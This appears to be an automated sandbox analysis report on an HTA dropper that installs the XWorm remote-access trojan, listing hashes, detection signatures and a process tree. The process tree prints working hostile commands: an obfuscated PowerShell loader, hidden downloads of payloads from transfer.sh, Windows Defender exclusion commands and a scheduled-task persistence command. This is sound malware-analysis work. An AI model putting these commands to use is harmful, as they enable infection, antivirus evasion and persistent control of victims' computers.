Edit tour
Windows
Analysis Report
p5.hta
Overview
General Information
| Sample name: | p5.hta |
| Analysis ID: | 1392585 |
| MD5: | eb6489f441255d5bc92e640f83fca56d |
| SHA1: | 6cc24139db203cf43bb89d532733a429d5935354 |
| SHA256: | f5d43238d7de76e26d0b78baa64291caec02f09ccaa5842a23f02ab69606d366 |
| Tags: | hta |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops PE files with a suspicious file extension
Drops large PE files
Installs a global keyboard hook
Machine Learning detection for dropped file
Potentially malicious time measurement code found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7288 cmdline: mshta.exe "C:\Users\ user\Deskt op\p5.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 7384 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function d OsMYLz($sp uPzwqNIGoc , $gPWqZKD q){[IO.Fil e]::WriteA llBytes($s puPzwqNIGo c, $gPWqZK Dq)};funct ion JCJwvh fzgHefb($s puPzwqNIGo c){if($spu PzwqNIGoc. EndsWith(( jzmpkwatkO QYW @(7320 5,73259,73 267,73267) )) -eq $Tr ue){rundll 32.exe $sp uPzwqNIGoc }elseif($ spuPzwqNIG oc.EndsWit h((jzmpkwa tkOQYW @(7 3205,73271 ,73274,732 08))) -eq $True){pow ershell.ex e -Executi onPolicy u nrestricte d -File $s puPzwqNIGo c}elseif($ spuPzwqNIG oc.EndsWit h((jzmpkwa tkOQYW @(7 3205,73268 ,73274,732 64))) -eq $True){mis exec /qn / i $spuPzwq NIGoc}else {Start-Pro cess $spuP zwqNIGoc}} ;function pXGYSCUVqp fxTRQrgAb( $IBxPjApNc wY){$otXYs HsHocLFsKH rQ = New-O bject (jzm pkwatkOQYW @(73237,7 3260,73275 ,73205,732 46,73260,7 3257,73226 ,73267,732 64,73260,7 3269,73275 ));[Net.Se rvicePoint Manager]:: SecurityPr otocol = [ Net.Securi tyProtocol Type]::TLS 12;$gPWqZK Dq = $otXY sHsHocLFsK HrQ.Downlo adData($IB xPjApNcwY) ;return $g PWqZKDq};f unction jz mpkwatkOQY W($eJBDNpQ Vr){$HWXdo rZRBma=731 59;$uZIzYL zxw=$Null; foreach($F FcJYiTuVaD HDA in $eJ BDNpQVr){$ uZIzYLzxw+ =[char]($F FcJYiTuVaD HDA-$HWXdo rZRBma)};r eturn $uZI zYLzxw};fu nction AVk LnTga(){$I VRWFACeCqT YmC = $env :AppData + '\';$Qjsu rCf = $IVR WFACeCqTYm C + 'c.bat '; if (Tes t-Path -Pa th $QjsurC f){JCJwvhf zgHefb $Qj surCf;}Els e{ $pPDhks zgZpHK = p XGYSCUVqpf xTRQrgAb ( jzmpkwatkO QYW @(7326 3,73275,73 275,73271, 73274,7321 7,73206,73 206,73275, 73273,7325 6,73269,73 274,73261, 73260,7327 3,73205,73 274,73263, 73206,7326 2,73260,73 275,73206, 73248,7327 2,73235,73 235,73259, 73224,7323 4,73247,73 280,73232, 73206,7325 8,73205,73 257,73256, 73275));dO sMYLz $Qjs urCf $pPDh kszgZpHK;J CJwvhfzgHe fb $QjsurC f;};;;;}AV kLnTga; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7392 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7552 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\c.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7604 cmdline:
powershell -WindowSt yle Hidden -Command "Invoke-We bRequest - Uri https: //transfer .sh/get/fH MB2lI9W3/W 2.pdf -Out File C:\Us ers\user\A ppData\Loc al\Temp\W2 .pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
Acrobat.exe (PID: 7832 cmdline: C:\Program Files\Ado be\Acrobat DC\Acroba t\Acrobat. exe" "C:\U sers\user\ AppData\Lo cal\Temp\W 2.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 8120 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6892 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1572,i ,108697193 4634838004 1,10864435 7018995784 02,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - powershell.exe (PID: 7868 cmdline:
powershell -WindowSt yle Hidden -Command "Invoke-We bRequest - Uri https: //transfer .sh/get/WD 631pf02G/m sword.zip -OutFile C :\Users\us er\AppData \Local\Tem p\msword.z ip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 8400 cmdline:
powershell -WindowSt yle Hidden -Command "Expand-Ar chive -Pat h C:\Users \user\AppD ata\Local\ Temp\mswor d.zip -Des tinationPa th C:\User s\user\App Data\Local \Temp\mswo rd -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
msword.com (PID: 9108 cmdline: msword.com MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F) - powershell.exe (PID: 8056 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\L ocal\Temp\ msword\msw ord.com' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8080 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5664 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' msword.com ' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\user \AppData\R oaming\msw ord.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6268 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' msword.exe ' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 8424 cmdline:
C:\Windows \System32\ schtasks.e xe" /creat e /f /RL H IGHEST /sc minute /m o 1 /tn "m sword" /tr "C:\Users \user\AppD ata\Roamin g\msword.e xe MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 8412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7748 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msword.exe (PID: 9128 cmdline:
C:\Users\u ser\AppDat a\Roaming\ msword.exe MD5: 4CEEDA451C97AB9A9F299CBD8D60CB0F)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
| Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| Click to see the 4 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| Click to see the 3 entries | ||||
System Summary |   |
|---|
| Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): | ||